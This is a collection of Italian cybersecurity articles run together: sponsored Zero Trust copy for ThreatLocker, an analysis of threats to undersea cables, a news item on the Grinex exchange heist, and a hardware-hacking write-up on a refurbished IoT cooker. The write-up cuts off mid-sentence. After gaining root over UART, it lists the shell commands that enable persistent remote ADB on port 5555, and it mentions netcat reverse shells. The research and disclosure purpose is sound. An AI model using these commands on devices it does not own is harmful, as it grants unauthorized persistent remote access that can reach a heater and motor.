[12] “The United States and the European Union have each recently enacted legislation providing for an unprecedented volume of public investments in semiconductors, with the largest portion allocated to the establishment of new onshore chip production facilities. Substantial funds are also allocated to semiconductor research and development, supply chain security, and workforce expansion and training. These parallel initiatives have been prompted by an awareness in both regions of threats to economic and strategic security arising out of their dependency on foreign-made chips.”, cfr. https://www.csis.org/analysis/world-chips-acts-future-us-eu-semiconductor-collaboration
[13] L’architettura e il funzionamento di questi modelli si basano sui seguenti aspetti che vengono succintamente riportati: nodi locali (AUV/ROV). Ogni veicolo autonomo (es. droni Hydrone) esegue un modello Machine Learning locale (es. CNN o RNN) per analizzare pattern di traffico acustico o anomalie nei log di sistema. I dati grezzi rimangono on-board, mentre solo i gradienti del modello (pesi aggiornati) vengono cifrati con algoritmi post-quantistici (es. NTRU Prime) e trasmessi; aggregazione sicura su Gateway di superficie.
I gateway fungono da coordinatori FL, utilizzando protocolli come Secure Aggregation (SecAgg) per combinare gli aggiornamenti locali senza decifrarli. Tecniche di differential privacy, infine, aggiungono rumore controllato ai gradienti per prevenire inferenze sui dati sorgente; modello globale di Cyber Threat Intelligence (CTI). Il modello aggregato viene ridistribuito alle flotte, migliorando la capacità di rilevare malware sofisticati (es. attacchi DDoS mirati a reti acustiche).
[14] Il progetto ARCADIAN-IoT (Autonomous Trust, Security and Privacy Management Framework for IoT), finanziato dall’Unione Europea nell’ambito di Horizon 2020 (Grant Agreement 101020259), ha avuto l’obiettivo di sviluppare un framework innovativo per la gestione decentralizzata di fiducia, sicurezza e privacy nei sistemi IoT. Avviato a maggio 2021 con una durata di 36 mesi, il progetto ha coinvolto un consorzio multidisciplinare per affrontare le sfide critiche legate all’integrità dei dati, alla resilienza delle infrastrutture e alla conformità normativa in scenari IoT complessi.
Profilo Autore
Ricercatore senior della Struttura Mercato del Lavoro dell’INAPP (ex ISFOL). Laurea in Sociologia all’Università di Roma “La Sapienza”, Master in Data Science (DS) all’Università di Roma “Tor Vergata” nel 2015 e Master in Cybersecurity (SIIS) all’Università di Roma “La Sapienza” nel 2021. Svolge studi e ricerche sull’innovazione tecnologica, sulla cyber intelligence, sulla cybersicurezza, sulle professioni, sull’incrocio tra domanda ed offerta di lavoro, sulla formazione continua, sull’invecchiamento attivo, sulla contrattazione collettiva e, in generale, su tematiche di sociologia economica. Sta attualmente svolgendo il I Dottorato nazionale in Cybersecurity presso IMT Lucca e IIT CNR.
Zero Trust Security: come superare le sfide più comuni
Zero Trust Security non è più un’opzione. Il ransomware continua ad accelerare. Gli attaccanti diventano sempre più sofisticati. L’intelligenza artificiale evolve senza sosta. Il panorama delle minacce informatiche si trasforma a una velocità che i principi di sicurezza tradizionali non riescono più a stare al passo. In questo scenario, adottare un’architettura Zero Trust è l’unica risposta concreta alle minacce di domani.
Migrare verso il modello Zero Trust può sembrare un’impresa titanica. Richiede un cambiamento radicale nel modo di concepire la sicurezza, mettendo in discussione ogni aspetto dell’architettura di rete. I controlli di sicurezza tradizionali aggiungono livelli di difesa sopra reti e sistemi operativi intrinsecamente aperti: le regole del firewall vengono applicate ai gateway per bloccare il traffico malevolo, le configurazioni sicure vanno a correggere impostazioni locali predefinite tutt’altro che robuste.
Zero Trust ribalta completamente questa logica.
In una rete moderna e sicura, tutti i punti di accesso sono chiusi per impostazione predefinita. L’accesso alla rete o ai suoi endpoint viene concesso solo in condizioni specifiche e ben definite.
Abbandonare il consolidato paradigma di sicurezza tradizionale non è un passo semplice. È comprensibile voler rimandare l’adozione dello Zero Trust, soprattutto per le organizzazioni che operano in ambienti già strutturati e rodati. Da dove si comincia a trasformare un’intera architettura di sicurezza? Come si convincono colleghi e vertici aziendali ad accettare un cambiamento così profondo? E soprattutto, chi ne sostiene i costi?
Sono domande legittime che meritano risposte concrete e che, con la giusta pianificazione e gli strumenti adeguati, possono tutte trovare una soluzione.
Il tempo, però, stringe. Le vulnerabilità zero-day non aspettano che le reti si adeguino. Ogni infrastruttura prima o poi verrà attaccata: che l’attacco vada a segno o meno dipenderà, in larga misura, dall’aver compiuto o meno il salto verso Zero Trust.
Gli ostacoli lungo il percorso Zero Trust Security
Nel cammino verso l’adozione del modello Zero Trust si incontrano inevitabilmente ostacoli, sia tecnici che organizzativi. Ecco le sfide più frequenti e come ThreatLocker aiuta ad affrontarle.
Come evitare interruzioni operative?
Un approccio Zero Trust richiede di proteggere gli endpoint bloccando per default tutte le applicazioni e consentendo l’esecuzione solo di quelle esplicitamente autorizzate. Il principio del “nega tutto per impostazione predefinita” è un cardine dello Zero Trust, ma l’idea di bloccare qualcosa di essenziale per le operazioni è comprensibilmente fonte di preoccupazione.
Per evitare disservizi è fondamentale, prima di tutto, definire una baseline delle attività ordinarie su tutti gli ambienti applicativi. Comprendere il numero atteso di esecuzioni e installazioni in un dato arco di tempo permette di prendere decisioni consapevoli su quali applicazioni debbano rimanere autorizzate.
Come aiuta ThreatLocker
Con ThreatLocker, gli agenti non iniziano a bloccare le applicazioni finché non hanno completato una fase di apprendimento approfondita di tutto ciò che gira su ogni endpoint. Le policy di autorizzazione vengono create automaticamente e non vengono applicate fino a quando non si decide di attivarle. Nel frattempo, ogni esecuzione e installazione viene tracciata, evidenziando ciò che sarebbe stato bloccato. Endpoint e utenti continuano a operare normalmente, mentre la modalità di apprendimento cataloga silenziosamente tutto in background.
Non abbiamo personale sufficiente per gestire la migrazione.
Allocare le risorse disponibili in modo efficace è una delle sfide ricorrenti in qualsiasi progetto IT. I progetti si allungano o vengono accantonati di fronte a priorità concorrenti. Peggio ancora, distribuire le risorse oltre le proprie capacità rischia di compromettere l’intero deployment Zero Trust.
Per i team ridotti, una strada praticabile è un rollout graduale di agenti leggeri, partendo dai sistemi o dagli utenti a maggior rischio e ampliando progressivamente il perimetro man mano che le policy si consolidano. Introducendo l’enforcement per fasi controllate e gestendo le policy in modo centralizzato, si può rafforzare la postura di sicurezza senza sovraccaricare le risorse disponibili.
Come aiuta ThreatLocker
ThreatLocker elimina questo rischio attraverso un rollout strutturato e controllato. Il software agente può essere distribuito reparto per reparto, o addirittura macchina per macchina, accompagnando l’organizzazione verso l’architettura Zero Trust secondo ritmi compatibili con le esigenze operative. Gli ambienti dotati di strumenti di remote monitoring and management (RMM) possono persino automatizzare il deployment degli agenti grazie alle decine di integrazioni native supportate dalla piattaforma.
Non disponiamo del supporto tecnico necessario.
Non tutte le organizzazioni hanno la fortuna di poter contare su esperti IT o di sicurezza interni. Le piccole e medie imprese spesso esternalizzano queste funzioni a managed service provider (MSP), i cui accordi contrattuali potrebbero non includere il supporto necessario per implementare o gestire servizi di sicurezza avanzati.
Chi dispone di supporto limitato può comunque partire dai principi ad alto impatto e bassa complessità: verificare ogni richiesta di accesso, applicare il principio del minimo privilegio, proteggere i sistemi critici prima degli altri. Un’implementazione graduale permette di migliorare la sicurezza senza richiedere fin dall’inizio una specializzazione tecnica approfondita.
Come aiuta ThreatLocker
Ogni deployment di ThreatLocker è accompagnato da un Solutions Engineer dedicato, in grado di orientarsi nel contesto specifico di ciascun cliente. Ogni fase del deployment viene pianificata durante un periodo di onboarding personalizzato sull’organizzazione, dall’installazione degli agenti alla fase di apprendimento fino all’attivazione del blocco delle applicazioni. Una volta completato l’onboarding, le eventuali lacune di competenza vengono colmate grazie all’accesso 24/7 al team Cyber Hero, con tempi di risposta in chat inferiori al minuto.
Il nostro ambiente ibrido è troppo eterogeneo per implementare Zero Trust.
Molte piccole imprese esitano ad adottare Zero Trust perché i loro ambienti sono un mosaico di server on-premise, piattaforme cloud, endpoint remoti e sistemi legacy nati prima che i moderni principi di sicurezza diventassero una priorità. La percezione che Zero Trust richieda una revisione architettonica completa blocca spesso il progetto ancora prima di cominciare.
In realtà, Zero Trust può essere applicato in modo coerente anche negli ambienti ibridi, senza necessità di ricostruire tutto da zero. Applicare controlli di accesso basati sull’identità e sul minimo privilegio, anziché sui perimetri di rete tradizionali, è un principio fondante dello Zero Trust e non richiede una riprogettazione dell’infrastruttura.
Zero Trust Security: come aiuta ThreatLocker
Ambienti cloud e reti che ospitano sistemi operativi eterogenei possono sembrare difficili da proteggere con un approccio Zero Trust, ma i prodotti ThreatLocker si adattano a qualsiasi contesto, distribuendo gli agenti con la stessa semplicità su dispositivi cloud e hardware fisici, su Windows, macOS e Linux. Mentre gli agenti ThreatLocker applicano i controlli Zero Trust sugli endpoint on-premise e cloud, ThreatLocker Cloud Control estende la copertura all’infrastruttura Microsoft 365: tentativi di connessione e autenticazione al tenant cloud vengono monitorati e bloccati salvo che non provengano da indirizzi esplicitamente attendibili.
Le diverse aree aziendali hanno esigenze di sicurezza differenti.
La struttura organizzativa può complicare qualsiasi implementazione tecnologica trasversale. Un’area di business potrebbe non aver bisogno delle stesse protezioni Zero Trust di un’altra. Un cliente di un MSP potrebbe voler gestire autonomamente il proprio stack di sicurezza, mentre un altro preferisce delegarlo completamente.
Un approccio efficace consiste nel definire confini logici chiari tra i reparti, limitando i controlli di sicurezza ai dispositivi, agli utenti e ai domini di ciascuno.
Come aiuta ThreatLocker
ThreatLocker gestisce qualsiasi framework organizzativo separando prodotti, policy e modalità di fatturazione Zero Trust su tutti i confini logici necessari alla rete. A supporto di ogni tipo di organizzazione, la piattaforma mette a disposizione migliaia di definizioni di applicazioni native per Windows, macOS e Linux, in grado di adattarsi a qualsiasi ambiente applicativo.
È possibile mantenere la conformità agli obblighi normativi?
I framework e le normative di compliance contengono spesso indicazioni molto specifiche su come soddisfare i requisiti di sicurezza inclusi. Le organizzazioni non possono permettersi di uscire dalla conformità, ma i principi dello Zero Trust sono pienamente compatibili con queste richieste.
Essendo all’avanguardia nella moderna architettura di sicurezza, l’adozione dello Zero Trust avvicina concretamente una rete alla conformità normativa, anche rispetto ai controlli tradizionali. Lo Zero Trust supporta per natura le aspettative più comuni dei framework di compliance: verifica continua degli accessi, minimo privilegio e controllo degli accessi sono requisiti trasversali alla maggior parte delle normative di sicurezza vigenti.
Come aiuta ThreatLocker
Le protezioni Zero Trust offerte da ThreatLocker supportano la conformità a decine di diversi framework di sicurezza e la piattaforma è presente nel marketplace FedRAMP del governo federale statunitense.
Come convincere il management aziendale?
Il consenso della leadership è una sfida raramente considerata in fase di pianificazione, ma con conseguenze significative sull’intero progetto. Alcune iniziative non superano nemmeno la fase di proposta senza riuscire a coinvolgere i giusti interlocutori ai vertici. I principali stakeholder e i responsabili dei budget potrebbero chiedersi: “Perché investire in Zero Trust se non abbiamo mai subito una violazione?”
La domanda non è se si verrà colpiti, ma quando. Proteggere la rete ora costa molto meno che rimediare ai danni in seguito. In materia di cybersecurity, la protezione va inquadrata come un investimento: adottare lo Zero Trust equivale a ridurre i costi, migliorare la reputazione aziendale e rafforzare la fiducia dei clienti.
Come aiuta ThreatLocker
ThreatLocker ha semplificato le conversazioni con il management grazie al valore tangibile portato ai propri clienti, testimoniato da una riduzione pressoché totale degli incidenti di sicurezza gestibili. Questo report di Forrester illustra il ROI concreto raggiungibile dalle aziende dopo il deployment delle protezioni Zero Trust di ThreatLocker.
Il cambiamento di mentalità: l’ultimo ostacolo
Per molti responsabili IT e di sicurezza, l’ostacolo più grande verso lo Zero Trust non è il deployment degli agenti: è lasciarsi alle spalle il modello di sicurezza che hanno padroneggiato nel corso dell’intera carriera. Cambiare è difficile, e ci vuole coraggio per trovare la volontà di adattarsi. ThreatLocker rende semplice il passaggio allo Zero Trust: spetta all’organizzazione prendere la decisione.
La situazione dei cavi sottomarini è attualmente uno degli argomenti maggiormente studiati e analizzati a livello globale.
L’odierno contesto geopolitico è il frutto di una serie di mutamenti che stanno interessando molteplici aree nel mondo. Spesso alcune di queste zone corrispondono a importanti snodi di cavi sottomarini che, in taluni casi, coincidono con teatri di scontro diretto tra diversi attori attraverso azioni di mappatura, sabotaggio e manipolazione del flusso dati trasmessi mediante i cavi stessi.
Evoluzione strategica e dominio dei cavi sottomarini
A partire dalla conclusione del secondo conflitto mondiale abbiamo assistito ad un progressivo mutamento degli assetti strategici, del modus operandi e delle politiche delle superpotenze. Il classico binomio tra il dominio della terra e il dominio del mare – introdotto da Carl Schmitt – nel tempo è mutato e inevitabilmente si è evoluto con l’avvento dei nuovi progressi tecnologici e con lo sviluppo delle strategie operative. Per poter svolgere un’analisi coerente e attuale legata ai cavi sottomarini è allora necessario studiare le variabili che possono essere reperite da più fonti, nello specifico provenienti dai nuovi concetti di dominio marittimo, dominio spaziale e dominio cyber.
Lo sviluppo dell’idea di “sea power”, introdotto da Alfred Thayer Mahan nella sua duplice interpretazione, ha delineato un punto di partenza per una migliore comprensione della situazione dei cavi sottomarini.
Circa il 95% del traffico mondiale dei dati avviene attraverso l’utilizzo dei cavi subacquei. Attualmente, le aree che maggiormente sono interessate dai fenomeni precedentemente descritti sono:
Golfo della Finlandia – Mar Baltico
Mar Rosso
Canale di Sicilia
Mar Cinese Meridionale
Oceano Atlantico
Regione Artica
Oceano Indiano
L’Italia non è esente dai pericoli derivanti da atti ostili nei riguardi delle infrastrutture sottomarine.
A partire dal conflitto in Ucraina, sono aumentate le segnalazioni di potenziali atti legati allo studio, alla mappatura e all’intercettazione dei dati in transito nei cavi sottomarini nel Mediterraneo. Nell’ottobre del 2022, nella zona al largo delle coste francesi (in prossimità di Marsiglia), sono stati danneggiati tre importanti cavi sottomarini che mettevano in collegamento Milano, Barcellona e Marsiglia. Un caso è la presenza della nave battente bandiera russa Yantar, ufficialmente dedicata allo studio oceanografico, dotata invece di sofisticati apparati per il monitoraggio e potenzialmente per il sabotaggio dei cavi sottomarini.
Sempre nel 2022, emblematica è stata anche l’azione di sabotaggio ai danni del cavo Sheva-2 nelle acque del Mar Baltico; in questo caso si propende per un atto dimostrativo.
Undersea Telecommunication Cable System (source CRS)Cavi danneggiati a Marsiglia 1
Tra gli aspetti da considerare durante l’analisi delle linee dati sottomarine vi sono lo studio della provenienza, della tecnologia impiegata e dell’azienda che ha prodotto quei cavi.
Altri casi recenti di sabotaggio mediante danneggiamento meccanico, accaduti nella zona del Baltico, hanno colpito il cavo sottomarino che metteva in comunicazione il Baltico con la Scandinavia e la linea sottomarina di collegamento tra Germania e Finlandia.
Cavi danneggiati a Marsiglia 2
Aziende e infrastrutture dei cavi sottomarini
Le società che a livello internazionale si occupano della fabbricazione e/o della sicurezza dei cavi sottomarini sono:
TE SubCom – https://www.fibre-systems.com/company/te-subcom
NEC Corporation – https://www.nec.com/en/global/prod/nw/submarine/index.html
Alcatel Submarine Networks (ASN), ex proprietà di Nokia, venduta in data 3/1/25 alla Repubblica Francese – https://www.asn.com
HMN Technologies (Huawei Marine Networks), dal 2020 di proprietà della Hengtong group per l’81% e della New Saxon 2019 (UK) per il rimanente 19% – https://www.hmntech.com
Maritech – https://maritechgroup.com
I principali sistemi e modalità utilizzati per l’attacco ai cavi sottomarini sono:
atti di sabotaggio mediante l’utilizzo di navi o sottomarini che prevedono il danneggiamento della struttura
attività di intercettazione e/o manipolazione dei dati mediante attacchi informatici alle stazioni di atterraggio dei cavi
attività sofisticate e maggiormente strutturate di intercettazione dei dati mediante installazione di supporti hardware direttamente sui cavi
attacchi con modalità ibride
L’Italia, nel corso del tempo, ha progettato e implementato due importanti linee di comunicazione sottomarina con elevati standard di sicurezza: il Green-Med (che collega la nostra penisola con la Croazia, il Montenegro, l’Albania, la Grecia e la Turchia) e il Blue Med, che mette in collegamento l’Italia con il Nord Africa, la Grecia e la Francia.
Per quanto concerne gli attacchi cyber, come in precedenza segnalato, principalmente vengono utilizzate modalità di intercettazione dei dati attraverso l’attacco delle stazioni di atterraggio dei cavi utilizzando tecniche che sfruttano le vulnerabilità dei sistemi. Nel 2022 si è registrato un attacco cyber nelle Hawaii, con obiettivo le infrastrutture di Oahu; in questo caso è stato violato il sistema informatico di una società privata che aveva accesso diretto ai server di un cavo sottomarino alle Hawaii.
Tra le vulnerabilità note nell’ambito dei cavi sottomarini, sicuramente è importante citare i sistemi di gestione delle reti a distanza. Lo scopo degli RNMS è poter monitorare e controllare in remoto le attività via cavo, come la potenza e la trasmissione dei dati. I sistemi RNMS in molti casi operano in modalità non air-gapped e questo significa aumentare notevolmente la possibilità di essere attaccati, considerando anche il fatto che utilizzano protocolli come TCP/IP e comuni versioni di Linux o Windows.
Tra le funzionalità connesse, è doveroso ricordare che i sistemi di gestione delle reti a distanza si interfacciano con i sistemi per la gestione delle lunghezze d’onda all’interno della rete in fibra ottica e prevedono anche la gestione delle lunghezze d’onda in diversi punti della rete. Il risultato è una gestione armonica ed efficiente del traffico dati. Essendo il sistema RNMS collegato a internet è però da considerarsi quasi certa la possibilità di hackeraggio, esponendo il sistema stesso a una serie di scenari legati all’intercettazione e al sabotaggio.
Per mitigare il rischio di attacchi cyber ai sistemi di controllo remoto, è possibile implementare sistemi di controllo automatico del traffico dati e controlli maggiormente restrittivi sugli accessi, prevedendo inoltre il passaggio a sistemi air-gapped. Sicuramente il ruolo della NATO in questo contesto è fondamentale e molte azioni sono già state attuate: l’importante è strutturare azioni condivise che possano prevedere un maggiore controllo e indipendenza dalle infrastrutture dei paesi non aderenti al Patto Atlantico.
Alcune azioni utili all’Italia per il monitoraggio e protezione dei cavi sottomarini potrebbero essere:
consolidare e sviluppare l’attuale accordo tra Sparkle e il Ministero della Difesa
pianificare un progetto tra CNR, INGV e Ministero della Difesa per il monitoraggio delle linee sottomarine, mediante boe dotate di sistemi per la rilevazione dei suoni e altri parametri come la salinità e il ph dell’acqua, la conduzione e il grado di ossigenazione. L’elaborazione dei dati e il loro studio potrebbero agevolare momenti nell’ambito della science diplomacy, utili al mantenimento e consolidamento dei rapporti con gli altri paesi dell’area mediterranea.
Scopri di più consultando il white paper “Quaderni di Cyber Intelligence #8”, dove troverai analisi avanzate, case study e prospettive strategiche dedicate alle infrastrutture critiche, alla geopolitica digitale e alla governance della dimensione subacquea.
Fonti:
Schmitt Carl, “Terra e Mare”, Adelphi, Milano, 2002
Luttwak Edward N., “Strategia, la logica della guerra e della pace”, Bur, Milano, 1989
Appassionato del mondo digitale, durante gli studi accademici ha potuto lavorare e studiare in tre atenei negli Stati Uniti dove ha consolidato la passione per l’ambito digitale. Concluso il percorso accademico con la laurea magistrale in Economia e Marketing ha maturato esperienze lavorative diversificate specializzandosi nella cybersecurity con focus nell’intelligence economica e nella geopolitica attraverso corsi specializzanti. Svolge la sua attività come libero professionista, collabora attivamente con la piattaforma Wikistrat in qualità di Analyst Expert. È Socio Ordinario della Società Italiana di Intelligence e membro della Commissione di Studio su Cyber Threat Intelligence e Cyber Warfare. Inoltre, è Socio della Società Italiana di Storia Militare SISM. È appassionato nello studio della storia, della filosofia ed entusiasta radioamatore.
US-sanctioned currency exchange says $15 million heist done by “unfriendly states”
Grinex, a US-sanctioned cryptocurrency exchange registered in Kyrgyzstan, said it’s halting operations after experiencing a $13 million heist carried out by “western special services” hackers.
Researchers from TRM, which has confirmed the theft, put the value of stolen assets at $15 million after discovering roughly 70 drained addresses, about 16 more than Grinex reported. Neither TRM nor fellow blockchain research firm Elliptic has said how the attackers slipped past Grinex’s defenses. Grinex said it has been under almost constant attack attempts since incorporating 16 months ago. The latest attacks, it said, targeted Russian users of the exchange.
Damaging “Russia’s financial sovereignty”
“The digital footprints and nature of the attack indicate an unprecedented level of resources and technology available exclusively to the structures of unfriendly states,” Grinex said. “According to preliminary data, the attack was coordinated with the aim of causing direct damage to Russia’s financial sovereignty.”
“Due to the attack, the Grinex exchange is forced to suspend operations,” Grinex continued. “All available information has been transferred to law enforcement agencies. An application has been submitted to the location of the infrastructure to initiate a criminal case.”
TRM said that TokenSpot, a second Kyrgyzstan-based exchange, was also breached. Two of the exchange’s addresses sent funds to the same consolidation address used by the affected Grinex-linked wallets. What’s more, both exchanges became inoperable on Wednesday, suggesting they were hit by the same attacker.
TRM said TokenSpot was a front for Grinex, which the US Treasury Department sanctioned last year. The department’s Office of Foreign Assets Control said that Grinex, in turn, was a rebrand of Garantex, an exchange it had sanctioned in 2022. The department said then that Ganantex had “directly facilitated notorious ransomware actors and other cybercriminals by processing over $100 million in transactions linked to illicit activities since 2019.” Last year’s sanctions against Grinex came a few months after TRM said that the exchange was likely a front for Ganantex.
Usato una volta, hackerato due volte: il debito di sicurezza dei dispositivi IoT ricondizionati
Il mercato dei dispositivi IoT (Internet of Things) ha conosciuto una crescita esponenziale negli ultimi anni, portando nelle nostre case, uffici e infrastrutture critiche miliardi di dispositivi connessi: elettrodomestici intelligenti, telecamere di sorveglianza, router, wearable, sistemi industriali e molto altro. Tuttavia, questa proliferazione capillare ha portato con sé una superficie di attacco senza precedenti. I dispositivi IoT sono oggi tra i bersagli preferiti degli attori malevoli, complici la scarsa attenzione alla sicurezza in fase di progettazione, l’utilizzo di software obsoleto e privo di aggiornamenti, credenziali di default mai modificate, e interfacce di debug lasciate aperte in produzione.
Le conseguenze di queste lacune non sono meramente teoriche: botnet composte da milioni di dispositivi IoT compromessi hanno già causato interruzioni su scala globale, violazioni di dati sensibili e – come illustra il caso analizzato in questo articolo – la possibilità concreta di causare danni fisici agli utenti finali attraverso il controllo remoto non autorizzato di componenti hardware. In uno scenario in cui un elettrodomestico da cucina può diventare un vettore di attacco, il tema della sicurezza IoT smette di essere una questione puramente tecnica e diventa una responsabilità etica e legale dei produttori.
Secure by Design, Secure by Default. I produttori di dispositivi IoT hanno la responsabilità di integrare la sicurezza in ogni singola fase del ciclo di vita del prodotto: dalla progettazione hardware e software, allo sviluppo del firmware, fino alla distribuzione, alla gestione degli aggiornamenti e alla dismissione del dispositivo. Ciò implica l’adozione di pratiche consolidate come la Threat Modeling, il Penetration Testing hardware e software, la gestione sicura delle credenziali, la disabilitazione delle interfacce di debug in produzione, la cifratura delle comunicazioni e la disponibilità di un processo strutturato di Vulnerability Disclosure e patch management per l’intera vita utile del prodotto.
Oltre all’impatto diretto sulla sicurezza dei propri clienti, i produttori devono oggi confrontarsi con un quadro normativo in rapida evoluzione. Il Cyber Resilience Act (CRA) – il regolamento europeo sulla cyber-resilienza dei prodotti con elementi digitali – stabilisce requisiti obbligatori di cybersecurity per tutti i prodotti hardware e software immessi sul mercato dell’Unione Europea.
Il CRA, entrato in vigore il 10 dicembre 2024, con piena applicazione obbligatoria dall’11 dicembre 2027, impone ai produttori di garantire che i propri dispositivi siano progettati senza vulnerabilità note sfruttabili, che le credenziali di accesso predefinite siano uniche o modificabili dall’utente, che le interfacce non necessarie siano disabilitate, e che vengano forniti aggiornamenti di sicurezza per tutta la durata del supporto dichiarata. La mancata conformità al CRA può comportare sanzioni fino a 15 milioni di euro o al 2,5% del fatturato globale annuo e l’impossibilità di commercializzare il prodotto nel mercato europeo.
Il caso pratico che segue – basato sull’analisi di un comune elettrodomestico IoT acquistato ricondizionato – illustra in modo concreto e diretto il tipo di vulnerabilità che i produttori dovrebbero identificare ed eliminare prima che i loro dispositivi raggiungano le mani degli utenti finali. Non si tratta di un attacco sofisticato condotto da un threat actor avanzato: si tratta di tecniche di base, alla portata di chiunque disponga degli strumenti giusti e di qualche ora di tempo libero. E questo, nel 2026, non è più accettabile.
Nelle pagine che seguono, Luca Bongiorni – security researcher e sviluppatore del tool WHIDBOARD – racconta in prima persona l’analisi condotta sul dispositivo: un resoconto tecnico diretto, nella forma del security writeup, che documenta ogni fase dell’attività di ricerca.
Ho fame di hardware hacking
Di recente ho completato la fase di R&D di un nuovo strumento chiamato WHIDBOARD e, per testarlo, ho deciso di dare un’occhiata a un elettrodomestico da cucina IoT comprato ricondizionato presso un negozio online. Il risultato è stato inaspettatamente esilarante!
Dimostrazione live del WHIDBOARD in azione
Il DUT (Device Under Test) di questo post è un elettrodomestico da cucina intelligente (i.e. un cosidetto IoT Smart Cooker).
Si tratta di un robot da cucina multifunzione all-in-one con 37 funzioni, dotato di un touch screen da 5″ e controllabile da remoto tramite la sua app mobile – si connette tramite rete WiFi. Poiché la versione ricondizionata era più economica… e tanto non la userei mai per cucinare… l’ho acquistato senza pensarci.
Il dispositivo IoT Smart Cooker (DUT)
Ricondizionato ≠ reset di fabbrica
Frequentemente i negozi online permettono ai clienti di restituire articoli che non soddisfano le loro aspettative… Ma sorge una domanda più che legittima: dove finiscono questi articoli? Come vengono ricondizionati? Viene eseguito un factory reset PRIMA della rivendita?!
Dopo l’accensione, mi sono connesso alla mia rete WiFi e ho cercato di associarlo all’app mobile… ma è successa una cosa divertente. Il DUT era già associato a un altro (probabilmente il precedente) proprietario. Mi chiedo cosa direbbe un DPO di questa situazione…
Dispositivo già associato al precedente proprietario
Dal punto di vista della protezione dei dati personali, il dispositivo ricondizionato conteneva ancora le credenziali e l’associazione di account del precedente proprietario, rendendo i suoi dati accessibili al nuovo acquirente senza alcuna azione richiesta. Ai sensi dell’art. 25 del GDPR (Privacy by Design e by Default), il venditore di ricondizionato avrebbe dovuto garantire, come misura tecnica adeguata, l’esecuzione di un factory reset certificato prima della rivendita. La mancata sanitizzazione potrebbe configurare una violazione dei dati personali ai sensi dell’art. 33 GDPR, con obbligo di notifica all’Autorità Garante entro 72 ore dalla scoperta.
Smontaggio del DUT
Da un’ispezione iniziale dell’esterno, è possibile notare un primo indizio interessante: una porta USB micro nascosta.
Porta USB micro nascostaDettaglio della porta USB
Tuttavia, collegandola a un computer non succede nulla di particolarmente interessante. Il passo successivo è stato aprire il target: tra tutti gli altri componenti (touch screen, interruttori, sensori, motori, alimentatore, ecc…) mi sono ritrovato davanti alla scheda madre.
Scheda madre del dispositivo — vista 1Scheda madre del dispositivo — vista 2
I componenti principali identificati:
A213Y – Amlogic SoC
KLM8G1GETF-B041 – memoria flash eMMC da 8GB con footprint FBGA-153
RS256M16V0DB-107AT – DDR SDRAM con footprint FBGA-96
Sono presenti anche alcuni punti di accesso interessanti per le interfacce di debug…
Punti di accesso per le interfacce di debug
Ma il punto di accesso più interessante si trovava sul lato opposto: alcuni test pad etichettati con il classico pinout dell’interfaccia di debug UART (GND, RX, TX).
Schema dei test pad UARTTest pad UART sulla PCB
Il passo successivo era scontato: saldare un paio di fili su quei pad, prendere il mio WHIDBOARD e verificare – con il Logic Analyzer e il Pin Enumerator – se si trattasse davvero di un’interfaccia di debug UART.
WHIDBOARD collegato ai test pad
Prima ho collegato tutti i fili al morsettino del Logic Analyzer del WHIDBOARD per sniffare qualche dato. Ecco cosa ho ottenuto su PulseView:
Output del Logic Analyzer su PulseView
Ottenere il Root tramite UART
Abbiamo confermato facilmente che i 3 test pad sul retro della PCB sono davvero una console UART funzionante, dal Logic Analyzer si vede il DUT che emette la sequenza di boot. Proviamo ora a connetterci direttamente con WHIDBOARD e il Pin Enumerator.
Connessione del Pin Enumerator WHIDBOARD
La funzione Pin Enumerator permette di scoprire automaticamente i pin di interfacce di debug come UART, JTAG e SWD. Nel mio caso ho usato soprattutto la funzione Passthrough per comunicare con il target collegato al morsettino e confermare la giusta combinazione di pin UART.
Interfaccia del Pin Enumerator
Una volta confermato con il Pin Enumerator che mi trovavo davanti a una porta di debug UART, ho usato la funzione Passthrough e sono stato accolto da un meraviglioso terminale con accesso root. BOOM!
Accesso root via UART
Cosa fare adesso?
A questo punto è chiaro che il dispositivo può essere compromesso con facilità. Ma volevo continuare a smanettare e capire come funziona la connessione remota…
Passo 1:abilitare la connessione ADB remota via WiFi
Ho abilitato la connessione ADB remota con i seguenti comandi:
setprop persist.service.adb.enable 1
setprop service.adb.tcp.port 5555
start adbd
Esecuzione dei comandi ADB
Ho confermato che tutto funzionava perfettamente:
Connessione ADB confermata
A questo punto abbiamo già una connessione remota persistente con il DUT (stessa LAN). Il daemon del server ADB persisterà anche dopo il riavvio.
Passo 2: ricognizione
Ho enumerato le app installate per verificare due cose: quale versione di Android è in esecuzione e quali sono le Le due app più interessanti:
Prima di continuare, ho avviato rapidamente le impostazioni Android con il comando:
am start -n com.android.settings/.Settings
…e come previsto il DUT girava su una versione vecchia di Android: 4.4.2. Un sistema operativo rilasciato nel 2013 e privo di patch di sicurezza dal 2017, da quasi un decennio.
Schermata impostazioni Android 4.4.2
Passo 3: ricognizione di rete
Guardando l’output di netstat ho rilevato alcune connessioni con indirizzi IP pubblici:
Output di netstatConnessioni di rete rilevate
Niente di particolarmente allarmante, ma uno ha attirato la mia curiosità. Poiché si trattava di un backend di proprietà altrui, quindi l’ho considerato out-of-scope e mi sono concentrato su altro.
Passo 4: BusyBox
Ho poi cercato i soliti strumenti hacker per esfiltrare dati o ottenere una reverse shell da target IoT. Uno su tutti: Sua Maestà BUSYBOX. E questo ne aveva di ogni:
Comandi disponibili con BusyBox
Solo con esso avrei potuto esfiltrare, caricare, manipolare dati e ottenere una reverse shell con netcat. Ma andiamo avanti,con la shell ADB persistente non ne abbiamo bisogno questa volta. Con ADB Explorer ho scaricato tutti i file interessanti trovati in giro. Niente di molto interessante però: questo dispositivo non ha microfono né fotocamera… non possiamo nemmeno spiare la gente da remoto.
Lista file ADB Explorer
Analisi degli APK
Ho spostato la mia attenzione sugli APK del vendor:
vendor.androidrk3326functiontest-1.apk,suite di test funzionale per sensori e driver motori
vendor.smartcooker.app-2.apk – app principale del dispositivo
L’APK funzionale è interessante perché questo elettrodomestico IoT ha una bilancia integrata, un riscaldatore, un motore per mescolare il cibo e vari sensori, tutti controllati dalle due app (anche da remoto tramite smartphone…).
Per com.kitchenidea.cecotec.k2501-2.apk ho notato rapidamente che è una copia dell’update.apk trovato in /sdcard/,non serve analizzarli entrambi:
Confronto tra gli APK
L’analisi del secondo APK non ha fatto scattare troppi campanelli d’allarme, ma ha confermato che l’app ha pieno accesso a tutti i sensori, al riscaldatore, al motore, ecc. In teoria si potrebbe creare un malware che disturba la vittima da remoto inviando comandi arbitrari sulle porte seriali…
Permessi e capacità dell’APK
Ho anche verificato se ci fossero URL/IP interessanti hardcodati nelle due app… ma sembrano la solita robaccia:
